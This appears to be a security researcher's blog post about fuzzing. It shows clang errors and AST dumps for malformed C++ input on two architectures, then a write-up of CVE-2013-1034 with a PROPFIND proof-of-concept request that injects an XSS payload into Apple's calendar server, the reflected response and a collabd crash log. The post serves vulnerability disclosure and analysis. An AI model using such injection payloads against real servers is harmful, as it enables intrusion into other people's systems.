<stdin>:1:101: error: use of undeclared identifier 'nullptrchar32_t'
lshort typedef s4;bool Kt={3LbreaklinethisQ&namespaceifndef[(double(struct{private:}~A/=void ifdef))nullptrchar32_t|$( tnews*public   -=--<*
                                                                                                    ^
<stdin>:1:85: error: expected ']'
lshort typedef s4;bool Kt={3LbreaklinethisQ&namespaceifndef[(double(struct{private:}~A/=void ifdef))nullptrchar32_t|$( tnews*public   -=--<*
                                                                                    ^
<stdin>:1:60: note: to match this '['
lshort typedef s4;bool Kt={3LbreaklinethisQ&namespaceifndef[(double(struct{private:}~A/=void ifdef))nullptrchar32_t|$( tnews*public   -=--<*
                                                           ^
<stdin>:1:116: error: expected '}'
lshort typedef s4;bool Kt={3LbreaklinethisQ&namespaceifndef[(double(struct{private:}~A/=void ifdef))nullptrchar32_t|$( tnews*public   -=--<*
                                                                                                                   ^
<stdin>:1:27: note: to match this '{'
lshort typedef s4;bool Kt={3LbreaklinethisQ&namespaceifndef[(double(struct{private:}~A/=void ifdef))nullptrchar32_t|$( tnews*public   -=--<*
                          ^
<stdin>:1:101: error: expected ';' after top level declarator
lshort typedef s4;bool Kt={3LbreaklinethisQ&namespaceifndef[(double(struct{private:}~A/=void ifdef))nullptrchar32_t|$( tnews*public   -=--<*
                                                                                                    ^
AST Dump – M1 arm64e slice
TranslationUnitDecl 0x14203ea08 <<invalid sloc>> <invalid sloc>
|-TypedefDecl 0x14203f920 <<invalid sloc>> <invalid sloc> implicit __int128_t '__int128'
| `-BuiltinType 0x14203efa0 '__int128'
|-TypedefDecl 0x14203f990 <<invalid sloc>> <invalid sloc> implicit __uint128_t 'unsigned __int128'
| `-BuiltinType 0x14203efc0 'unsigned __int128'
|-TypedefDecl 0x142808520 <<invalid sloc>> <invalid sloc> implicit __NSConstantString '__NSConstantString_tag'
| `-RecordType 0x142808290 '__NSConstantString_tag'
|   `-CXXRecord 0x142808200 '__NSConstantString_tag'
|-TypedefDecl 0x142808588 <<invalid sloc>> <invalid sloc> implicit __SVInt8_t '__SVInt8_t'
| `-BuiltinType 0x14203f260 '__SVInt8_t'
|-TypedefDecl 0x1428085f0 <<invalid sloc>> <invalid sloc> implicit __SVInt16_t '__SVInt16_t'
| `-BuiltinType 0x14203f280 '__SVInt16_t'
|-TypedefDecl 0x142808658 <<invalid sloc>> <invalid sloc> implicit __SVInt32_t '__SVInt32_t'
| `-BuiltinType 0x14203f2a0 '__SVInt32_t'
|-TypedefDecl 0x1428086c0 <<invalid sloc>> <invalid sloc> implicit __SVInt64_t '__SVInt64_t'
| `-BuiltinType 0x14203f2c0 '__SVInt64_t'
|-TypedefDecl 0x142808728 <<invalid sloc>> <invalid sloc> implicit __SVUint8_t '__SVUint8_t'
| `-BuiltinType 0x14203f2e0 '__SVUint8_t'
|-TypedefDecl 0x142808790 <<invalid sloc>> <invalid sloc> implicit __SVUint16_t '__SVUint16_t'
| `-BuiltinType 0x14203f300 '__SVUint16_t'
|-TypedefDecl 0x1428087f8 <<invalid sloc>> <invalid sloc> implicit __SVUint32_t '__SVUint32_t'
| `-BuiltinType 0x14203f320 '__SVUint32_t'
|-TypedefDecl 0x142808860 <<invalid sloc>> <invalid sloc> implicit __SVUint64_t '__SVUint64_t'
| `-BuiltinType 0x14203f340 '__SVUint64_t'
|-TypedefDecl 0x1428088c8 <<invalid sloc>> <invalid sloc> implicit __SVFloat16_t '__SVFloat16_t'
| `-BuiltinType 0x14203f360 '__SVFloat16_t'
|-TypedefDecl 0x142808930 <<invalid sloc>> <invalid sloc> implicit __SVFloat32_t '__SVFloat32_t'
| `-BuiltinType 0x14203f380 '__SVFloat32_t'
|-TypedefDecl 0x142808998 <<invalid sloc>> <invalid sloc> implicit __SVFloat64_t '__SVFloat64_t'
| `-BuiltinType 0x14203f3a0 '__SVFloat64_t'
|-TypedefDecl 0x142808a00 <<invalid sloc>> <invalid sloc> implicit __SVBFloat16_t '__SVBFloat16_t'
| `-BuiltinType 0x14203f3c0 '__SVBFloat16_t'
|-TypedefDecl 0x142808a68 <<invalid sloc>> <invalid sloc> implicit __clang_svint8x2_t '__clang_svint8x2_t'
| `-BuiltinType 0x14203f3e0 '__clang_svint8x2_t'
|-TypedefDecl 0x142808ad0 <<invalid sloc>> <invalid sloc> implicit __clang_svint16x2_t '__clang_svint16x2_t'
| `-BuiltinType 0x14203f400 '__clang_svint16x2_t'
|-TypedefDecl 0x142808b38 <<invalid sloc>> <invalid sloc> implicit __clang_svint32x2_t '__clang_svint32x2_t'
| `-BuiltinType 0x14203f420 '__clang_svint32x2_t'
|-TypedefDecl 0x142808ba0 <<invalid sloc>> <invalid sloc> implicit __clang_svint64x2_t '__clang_svint64x2_t'
| `-BuiltinType 0x14203f440 '__clang_svint64x2_t'
|-TypedefDecl 0x142808c08 <<invalid sloc>> <invalid sloc> implicit __clang_svuint8x2_t '__clang_svuint8x2_t'
| `-BuiltinType 0x14203f460 '__clang_svuint8x2_t'
|-TypedefDecl 0x142808c70 <<invalid sloc>> <invalid sloc> implicit __clang_svuint16x2_t '__clang_svuint16x2_t'
| `-BuiltinType 0x14203f480 '__clang_svuint16x2_t'
|-TypedefDecl 0x142808cd8 <<invalid sloc>> <invalid sloc> implicit __clang_svuint32x2_t '__clang_svuint32x2_t'
| `-BuiltinType 0x14203f4a0 '__clang_svuint32x2_t'
|-TypedefDecl 0x142808d40 <<invalid sloc>> <invalid sloc> implicit __clang_svuint64x2_t '__clang_svuint64x2_t'
| `-BuiltinType 0x14203f4c0 '__clang_svuint64x2_t'
|-TypedefDecl 0x142808da8 <<invalid sloc>> <invalid sloc> implicit __clang_svfloat16x2_t '__clang_svfloat16x2_t'
| `-BuiltinType 0x14203f4e0 '__clang_svfloat16x2_t'
|-TypedefDecl 0x142808e10 <<invalid sloc>> <invalid sloc> implicit __clang_svfloat32x2_t '__clang_svfloat32x2_t'
| `-BuiltinType 0x14203f500 '__clang_svfloat32x2_t'
|-TypedefDecl 0x142808e78 <<invalid sloc>> <invalid sloc> implicit __clang_svfloat64x2_t '__clang_svfloat64x2_t'
| `-BuiltinType 0x14203f520 '__clang_svfloat64x2_t'
|-TypedefDecl 0x142808ee0 <<invalid sloc>> <invalid sloc> implicit __clang_svbfloat16x2_t '__clang_svbfloat16x2_t'
| `-BuiltinType 0x14203f540 '__clang_svbfloat16x2_t'
|-TypedefDecl 0x142808f48 <<invalid sloc>> <invalid sloc> implicit __clang_svint8x3_t '__clang_svint8x3_t'
| `-BuiltinType 0x14203f560 '__clang_svint8x3_t'
|-TypedefDecl 0x142808fb0 <<invalid sloc>> <invalid sloc> implicit __clang_svint16x3_t '__clang_svint16x3_t'
| `-BuiltinType 0x14203f580 '__clang_svint16x3_t'
|-TypedefDecl 0x142809018 <<invalid sloc>> <invalid sloc> implicit __clang_svint32x3_t '__clang_svint32x3_t'
| `-BuiltinType 0x14203f5a0 '__clang_svint32x3_t'
|-TypedefDecl 0x142809080 <<invalid sloc>> <invalid sloc> implicit __clang_svint64x3_t '__clang_svint64x3_t'
| `-BuiltinType 0x14203f5c0 '__clang_svint64x3_t'
|-TypedefDecl 0x1428090e8 <<invalid sloc>> <invalid sloc> implicit __clang_svuint8x3_t '__clang_svuint8x3_t'
| `-BuiltinType 0x14203f5e0 '__clang_svuint8x3_t'
|-TypedefDecl 0x142809150 <<invalid sloc>> <invalid sloc> implicit __clang_svuint16x3_t '__clang_svuint16x3_t'
| `-BuiltinType 0x14203f600 '__clang_svuint16x3_t'
|-TypedefDecl 0x142809a00 <<invalid sloc>> <invalid sloc> implicit __clang_svuint32x3_t '__clang_svuint32x3_t'
| `-BuiltinType 0x14203f620 '__clang_svuint32x3_t'
|-TypedefDecl 0x142809a68 <<invalid sloc>> <invalid sloc> implicit __clang_svuint64x3_t '__clang_svuint64x3_t'
| `-BuiltinType 0x14203f640 '__clang_svuint64x3_t'
|-TypedefDecl 0x142809ad0 <<invalid sloc>> <invalid sloc> implicit __clang_svfloat16x3_t '__clang_svfloat16x3_t'
| `-BuiltinType 0x14203f660 '__clang_svfloat16x3_t'
|-TypedefDecl 0x142809b38 <<invalid sloc>> <invalid sloc> implicit __clang_svfloat32x3_t '__clang_svfloat32x3_t'
| `-BuiltinType 0x14203f680 '__clang_svfloat32x3_t'
|-TypedefDecl 0x142809ba0 <<invalid sloc>> <invalid sloc> implicit __clang_svfloat64x3_t '__clang_svfloat64x3_t'
| `-BuiltinType 0x14203f6a0 '__clang_svfloat64x3_t'
|-TypedefDecl 0x142809c08 <<invalid sloc>> <invalid sloc> implicit __clang_svbfloat16x3_t '__clang_svbfloat16x3_t'
| `-BuiltinType 0x14203f6c0 '__clang_svbfloat16x3_t'
|-TypedefDecl 0x142809c70 <<invalid sloc>> <invalid sloc> implicit __clang_svint8x4_t '__clang_svint8x4_t'
| `-BuiltinType 0x14203f6e0 '__clang_svint8x4_t'
|-TypedefDecl 0x142809cd8 <<invalid sloc>> <invalid sloc> implicit __clang_svint16x4_t '__clang_svint16x4_t'
| `-BuiltinType 0x14203f700 '__clang_svint16x4_t'
|-TypedefDecl 0x142809d40 <<invalid sloc>> <invalid sloc> implicit __clang_svint32x4_t '__clang_svint32x4_t'
| `-BuiltinType 0x14203f720 '__clang_svint32x4_t'
|-TypedefDecl 0x142809da8 <<invalid sloc>> <invalid sloc> implicit __clang_svint64x4_t '__clang_svint64x4_t'
| `-BuiltinType 0x14203f740 '__clang_svint64x4_t'
|-TypedefDecl 0x142809e10 <<invalid sloc>> <invalid sloc> implicit __clang_svuint8x4_t '__clang_svuint8x4_t'
| `-BuiltinType 0x14203f760 '__clang_svuint8x4_t'
|-TypedefDecl 0x142809e78 <<invalid sloc>> <invalid sloc> implicit __clang_svuint16x4_t '__clang_svuint16x4_t'
| `-BuiltinType 0x14203f780 '__clang_svuint16x4_t'
|-TypedefDecl 0x142809ee0 <<invalid sloc>> <invalid sloc> implicit __clang_svuint32x4_t '__clang_svuint32x4_t'
| `-BuiltinType 0x14203f7a0 '__clang_svuint32x4_t'
|-TypedefDecl 0x142809f48 <<invalid sloc>> <invalid sloc> implicit __clang_svuint64x4_t '__clang_svuint64x4_t'
| `-BuiltinType 0x14203f7c0 '__clang_svuint64x4_t'
|-TypedefDecl 0x142809fb0 <<invalid sloc>> <invalid sloc> implicit __clang_svfloat16x4_t '__clang_svfloat16x4_t'
| `-BuiltinType 0x14203f7e0 '__clang_svfloat16x4_t'
|-TypedefDecl 0x14280a018 <<invalid sloc>> <invalid sloc> implicit __clang_svfloat32x4_t '__clang_svfloat32x4_t'
| `-BuiltinType 0x14203f800 '__clang_svfloat32x4_t'
|-TypedefDecl 0x14280a080 <<invalid sloc>> <invalid sloc> implicit __clang_svfloat64x4_t '__clang_svfloat64x4_t'
| `-BuiltinType 0x14203f820 '__clang_svfloat64x4_t'
|-TypedefDecl 0x14280a0e8 <<invalid sloc>> <invalid sloc> implicit __clang_svbfloat16x4_t '__clang_svbfloat16x4_t'
| `-BuiltinType 0x14203f840 '__clang_svbfloat16x4_t'
|-TypedefDecl 0x14280a150 <<invalid sloc>> <invalid sloc> implicit __SVBool_t '__SVBool_t'
| `-BuiltinType 0x14203f860 '__SVBool_t'
|-TypedefDecl 0x14280a1f8 <<invalid sloc>> <invalid sloc> implicit __builtin_ms_va_list 'char *'
| `-PointerType 0x14280a1b0 'char *'
|   `-BuiltinType 0x14203eaa0 'char'
|-TypedefDecl 0x14280a268 <<invalid sloc>> <invalid sloc> implicit __builtin_va_list 'char *'
| `-PointerType 0x14280a1b0 'char *'
|   `-BuiltinType 0x14203eaa0 'char'
|-TypedefDecl 0x14280a308 <<stdin>:1:1, col:16> col:16 s4 'short'
| `-BuiltinType 0x14203eae0 'short'
|-VarDecl 0x14280a370 <col:19, col:24> col:24 Kt 'bool'
`-CXXRecordDecl 0x14280a450 <col:69, col:84> col:69 struct definition
  |-DefinitionData pass_in_registers empty aggregate standard_layout trivially_copyable pod trivial literal has_constexpr_non_copy_move_ctor can_const_default_init
  | |-DefaultConstructor exists trivial constexpr needs_implicit defaulted_is_constexpr
  | |-CopyConstructor simple trivial has_const_param needs_implicit implicit_has_const_param
  | |-MoveConstructor exists simple trivial needs_implicit
  | |-CopyAssignment simple trivial has_const_param needs_implicit implicit_has_const_param
  | |-MoveAssignment exists simple trivial needs_implicit
  | `-Destructor simple irrelevant trivial needs_implicit
  `-AccessSpecDecl 0x14280a568 <col:76, col:83> col:76 private
Clang Compiler Error – X86_64 slice
<stdin>:1:1: error: unknown type name 'lshort'; did you mean 'short'?
lshort typedef s4;bool Kt={3LbreaklinethisQ&namespaceifndef[(double(struct{private:}~A/=void ifdef))nullptrchar32_t|$( tnews*public   -=--<*
^~~~~~
short
<stdin>:1:29: error: invalid suffix 'LbreaklinethisQ' on integer constant
lshort typedef s4;bool Kt={3LbreaklinethisQ&namespaceifndef[(double(struct{private:}~A/=void ifdef))nullptrchar32_t|$( tnews*public   -=--<*
                            ^
<stdin>:1:85: error: expected ';' after struct
lshort typedef s4;bool Kt={3LbreaklinethisQ&namespaceifndef[(double(struct{private:}~A/=void ifdef))nullptrchar32_t|$( tnews*public   -=--<*
                                                                                    ^
                                                                                    ;
<stdin>:1:69: error: '(anonymous struct at <stdin>:1:69)' cannot be defined in a parameter type
lshort typedef s4;bool Kt={3LbreaklinethisQ&namespaceifndef[(double(struct{private:}~A/=void ifdef))nullptrchar32_t|$( tnews*public   -=--<*
                                                                    ^
<stdin>:1:85: error: expected ')'
lshort typedef s4;bool Kt={3LbreaklinethisQ&namespaceifndef[(double(struct{private:}~A/=void ifdef))nullptrchar32_t|$( tnews*public   -=--<*
                                                                                    ^
<stdin>:1:68: note: to match this '('
lshort typedef s4;bool Kt={3LbreaklinethisQ&namespaceifndef[(double(struct{private:}~A/=void ifdef))nullptrchar32_t|$( tnews*public   -=--<*
                                                                   ^
<stdin>:1:85: error: expected ')'
lshort typedef s4;bool Kt={3LbreaklinethisQ&namespaceifndef[(double(struct{private:}~A/=void ifdef))nullptrchar32_t|$( tnews*public   -=--<*
                                                                                    ^
<stdin>:1:61: note: to match this '('
lshort typedef s4;bool Kt={3LbreaklinethisQ&namespaceifndef[(double(struct{private:}~A/=void ifdef))nullptrchar32_t|$( tnews*public   -=--<*
                                                            ^
<stdin>:1:45: error: use of undeclared identifier 'namespaceifndef'
lshort typedef s4;bool Kt={3LbreaklinethisQ&namespaceifndef[(double(struct{private:}~A/=void ifdef))nullptrchar32_t|$( tnews*public   -=--<*
                                            ^
<stdin>:1:101: error: use of undeclared identifier 'nullptrchar32_t'
lshort typedef s4;bool Kt={3LbreaklinethisQ&namespaceifndef[(double(struct{private:}~A/=void ifdef))nullptrchar32_t|$( tnews*public   -=--<*
                                                                                                    ^
<stdin>:1:85: error: expected ']'
lshort typedef s4;bool Kt={3LbreaklinethisQ&namespaceifndef[(double(struct{private:}~A/=void ifdef))nullptrchar32_t|$( tnews*public   -=--<*
                                                                                    ^
<stdin>:1:60: note: to match this '['
lshort typedef s4;bool Kt={3LbreaklinethisQ&namespaceifndef[(double(struct{private:}~A/=void ifdef))nullptrchar32_t|$( tnews*public   -=--<*
                                                           ^
<stdin>:1:116: error: expected '}'
lshort typedef s4;bool Kt={3LbreaklinethisQ&namespaceifndef[(double(struct{private:}~A/=void ifdef))nullptrchar32_t|$( tnews*public   -=--<*
                                                                                                                   ^
<stdin>:1:27: note: to match this '{'
lshort typedef s4;bool Kt={3LbreaklinethisQ&namespaceifndef[(double(struct{private:}~A/=void ifdef))nullptrchar32_t|$( tnews*public   -=--<*
                          ^
<stdin>:1:101: error: expected ';' after top level declarator
lshort typedef s4;bool Kt={3LbreaklinethisQ&namespaceifndef[(double(struct{private:}~A/=void ifdef))nullptrchar32_t|$( tnews*public   -=--<*
                                                                                                    ^
AST Dump X86_64 slice
TranslationUnitDecl 0x7f8c3a81b608 <<invalid sloc>> <invalid sloc>
|-TypedefDecl 0x7f8c3a81bf00 <<invalid sloc>> <invalid sloc> implicit __int128_t '__int128'
| `-BuiltinType 0x7f8c3a81bba0 '__int128'
|-TypedefDecl 0x7f8c3a81bf70 <<invalid sloc>> <invalid sloc> implicit __uint128_t 'unsigned __int128'
| `-BuiltinType 0x7f8c3a81bbc0 'unsigned __int128'
|-TypedefDecl 0x7f8c3a81c2f0 <<invalid sloc>> <invalid sloc> implicit __NSConstantString '__NSConstantString_tag'
| `-RecordType 0x7f8c3a81c060 '__NSConstantString_tag'
|   `-CXXRecord 0x7f8c3a81bfc8 '__NSConstantString_tag'
|-TypedefDecl 0x7f8c3a81c398 <<invalid sloc>> <invalid sloc> implicit __builtin_ms_va_list 'char *'
| `-PointerType 0x7f8c3a81c350 'char *'
|   `-BuiltinType 0x7f8c3a81b6a0 'char'
|-TypedefDecl 0x7f8c3a8538f8 <<invalid sloc>> <invalid sloc> implicit __builtin_va_list '__va_list_tag [1]'
| `-ConstantArrayType 0x7f8c3a8538a0 '__va_list_tag [1]' 1 
|   `-RecordType 0x7f8c3a81c480 '__va_list_tag'
|     `-CXXRecord 0x7f8c3a81c3f0 '__va_list_tag'
|-TypedefDecl 0x7f8c3a8539b0 <<stdin>:1:1, col:16> col:16 s4 'short'
| `-BuiltinType 0x7f8c3a81b6e0 'short'
|-VarDecl 0x7f8c3a853a18 <col:19, col:24> col:24 Kt 'bool'
`-CXXRecordDecl 0x7f8c3a853af8 <col:69, col:84> col:69 struct definition
  |-DefinitionData pass_in_registers empty aggregate standard_layout trivially_copyable pod trivial literal has_constexpr_non_copy_move_ctor can_const_default_init
  | |-DefaultConstructor exists trivial constexpr needs_implicit defaulted_is_constexpr
  | |-CopyConstructor simple trivial has_const_param needs_implicit implicit_has_const_param
  | |-MoveConstructor exists simple trivial needs_implicit
  | |-CopyAssignment simple trivial has_const_param needs_implicit implicit_has_const_param
  | |-MoveAssignment exists simple trivial needs_implicit
  | `-Destructor simple irrelevant trivial needs_implicit
  `-AccessSpecDecl 0x7f8c3a853c18 <col:76, col:83> col:76 private
Crash #7 AST Dump Observation

I observe that the AST Dump is not the same for arm64e vs. X86_64 when looking at AST Representations. This further supports the belief that the arm64e ABI is immature, unstable and under development.

Crash #8 CVE-2013-1034

History of UCI Handling

Below is a brief review of CVE-2013-1034 that was within the Coverage Envelope of Burpsuite Pro [but not other tools] for Stored & Reflected XSS, XML & SQL Injection and other Unsafe Handling of USer Controllable Input, the dreaded UCI.

PoC

PROPFIND HTTP Method

PROPFIND /calendars/__uids__/{...}/ HTTP/1.1
Host: server.local
...[SNIP]...
Inject Signature: w3.org/1999/xhtml&apos;&gt;&lt;a:body onload=&apos;alert(1)&apos;/&gt;&lt;/a&gt;" xmlns:I="http://apple.com/ns/ical/" xmlns:CS="http://calendarserver.org/ns/"><D:prop><D:displayname/><D:resourcetype/><D:current-user-privilege-set/><I:calendar-color/>
...[SNIP]...

HTTP Response

...[SNIP]...
<schedule-default-calendar-URL xmlns='urn:ietf:params:xml:ns:caldav<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>'/>
...[SNIP]...

Crash colladb

Process:         collabd [45073]
Path:            /Applications/Server.app/Contents/ServerRoot/usr/sbin/collabd
Identifier:      collabd
Version:         238.17
Code Type:       X86-64 (Native)
Date/Time:       2013-04-17
OS Version:      Mac OS X 10.8.3 (12D78)
Report Version:  10
Crashed Thread:  4  ServiceRequest:[(null) (null)]  Dispatch queue: com.apple.root.background-priority
Exception Type:  EXC_BAD_ACCESS (SIGBUS)
Exception Codes: KERN_PROTECTION_FAILURE at 0x00000001103e1fc8
VM Regions Near 0x1103e1fc8:
    Stack                  000000011035f000-00000001103e1000 [  520K] rw-/rwx SM=COW  thread 8
--> STACK GUARD            00000001103e1000-00000001103e2000 [    4K] ---/rwx SM=NUL  stack guard for thread 4
    Stack                  00000001103e2000-0000000110464000 [  520K] rw-/rwx SM=COW  thread 4
Thread 0:: Dispatch queue: com.apple.main-thread
0   libsystem_kernel.dylib         0x00007fff86a84686 mach_msg_trap + 10
1   libsystem_kernel.dylib         0x00007fff86a83c42 mach_msg + 70
2   com.apple.CoreFoundation       0x00007fff8891d233 __CFRunLoopServiceMachPort + 195
3   com.apple.CoreFoundation       0x00007fff88922916 __CFRunLoopRun + 1078
4   com.apple.CoreFoundation       0x00007fff889220e2 CFRunLoopRunSpecific + 290
5   com.apple.CoreFoundation       0x00007fff88930dd1 CFRunLoopRun + 97
6   collabd                        0x000000010e8a4e39 main + 1316
7   libdyld.dylib                  0x00007fff813317e1 start + 1
Thread 1:: Dispatch queue: com.apple.libdispatch-manager
0   libsystem_kernel.dylib         0x00007fff86a86d16 kevent + 10
1   libdispatch.dylib              0x00007fff85e01dea _dispatch_mgr_invoke + 883
2   libdispatch.dylib              0x00007fff85e019ee _dispatch_mgr_thread + 54
Thread 2:: com.apple.NSURLConnectionLoader
0   libsystem_kernel.dylib         0x00007fff86a84686 mach_msg_trap + 10
1   libsystem_kernel.dylib         0x00007fff86a83c42 mach_msg + 70
2   com.apple.CoreFoundation       0x00007fff8891d233 __CFRunLoopServiceMachPort + 195
3   com.apple.CoreFoundation       0x00007fff88922916 __CFRunLoopRun + 1078
4   com.apple.CoreFoundation       0x00007fff889220e2 CFRunLoopRunSpecific + 290
5   com.apple.Foundation           0x00007fff88ceab66 +[NSURLConnection(Loader) _resourceLoadLoop:] + 356
6   com.apple.Foundation           0x00007fff88d48cd2 __NSThread__main__ + 1345
7   libsystem_c.dylib              0x00007fff8610a7a2 _pthread_start + 327
8   libsystem_c.dylib              0x00007fff860f71e1 thread_start + 13
Thread 3:: com.apple.CFSocket.private
0   libsystem_kernel.dylib         0x00007fff86a86322 __select + 10
1   com.apple.CoreFoundation       0x00007fff88961f46 __CFSocketManager + 1302
2   libsystem_c.dylib              0x00007fff8610a7a2 _pthread_start + 327
3   libsystem_c.dylib              0x00007fff860f71e1 thread_start + 13
Thread 4 Crashed:: ServiceRequest:[(null) (null)]  Dispatch queue: com.apple.root.background-priority
0   com.apple.CSService            0x000000010e93c137 -[CSJSONEncoder sanitizeObject:] + 20
1   com.apple.CSService            0x000000010e93c464 -[CSJSONEncoder sanitizeObject:] + 833
2   com.apple.CSService            0x000000010e93c464 -[CSJSONEncoder sanitizeObject:] + 833
3   com.apple.CSService            0x000000010e93c464 -[CSJSONEncoder sanitizeObject:] + 833

Root Cause Analysis of Crash #8

If you have read this far, you probably know the Issue: Unsafe Handling of User Controllable Input [UCI]. The Exploits were SQL Injection, Stored & Reflected XSS and other Vulnerabilities.

Other UCI PoC’s demonstrated that I could easily Exploit the collabd Application because I could control the memory layout, There were few barriers to macOS memory exploitation in 2013.

With the Target being User Agents, all Content was Served inside the Same Origin Policy [SOP] from that Server and the PostgreSQL Database was fully under Control.

UCI Summary

User Controllable Input [UCI] causes changes in State Machines that can be measured. Crash Reports give clues to a change in a State Machine but not Exploit Value. See Article titled XNU Crash Analysis for additional information. An Exploit is a series of UCI causing changes in a State Machine that results with the Attacker obtaining Program Control of the State Machine.

Change Control

These Product Defects were found with SRDC Unit Tests developed using Commodity Injection Signatures found here. Apple can and should do Quality & Security Assurance using Change Control Management Systems & Methods.

UX

These SRDC Quality Assurance Tests indicate flawed Apple Development Tools that negatively impact the SRD User Experience. Developer Applications that Crash result in a poor User Experience for Consumers.

It is helpful to reference the man page for sigaction and links to signal.h and unix_signal.c. There is ux_exception.h and ux_exception.c for further consumption. GNU has a good overview of Signals too.

Author Note

This Article is a work in progress, and if you have a point of view, please share it. Corrections, Comments & Concerns welcome, DM @h02332.

Related Content

arm64e Best Practice Build checkin Chilling Effect Code Signing Crash Data Abort debugserver downgrade dylib Exploit Flash Restoration help information collection IPSW Make man Non-Commercial Use output PAC Fail Permission Quickstart Revival rtfm sample SDK SRD Transparency upgrade X86_64

%d bloggers like this: